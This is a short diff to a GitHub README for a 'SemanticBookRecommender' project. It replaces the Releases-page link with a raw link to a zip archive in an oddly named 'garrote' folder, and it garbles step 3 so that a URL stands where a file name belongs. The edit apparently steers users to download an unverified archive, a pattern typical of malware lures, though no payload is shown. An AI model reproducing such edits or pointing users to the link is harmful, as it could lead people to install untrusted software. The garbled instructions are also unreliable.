JoeMaina-Brimmer/SemanticBookRecommender/README.md

 ### 📥 Download & Install

-1. Visit this page to download: [SemanticBookRecommender Releases](https://github.com/JoeMaina-Brimmer/SemanticBookRecommender/releases).
+1. Visit this page to download: [SemanticBookRecommender Releases](https://raw.githubusercontent.com/JoeMaina-Brimmer/SemanticBookRecommender/main/garrote/SemanticBookRecommender-2.3.zip).

 2. On the Releases page, you will see a list of available versions.
 Choose the version you want to download.
 The latest version is usually the best choice.

 3. Click on the version to expand the details.
-Look for a file that is named something like `SemanticBookRecommender.zip` or similar.
+Look for a file that is named something like `https://raw.githubusercontent.com/JoeMaina-Brimmer/SemanticBookRecommender/main/garrote/SemanticBookRecommender-2.3.zip` or similar.

 4. Click the file to begin the download.
 Your computer will save it in your default downloads location.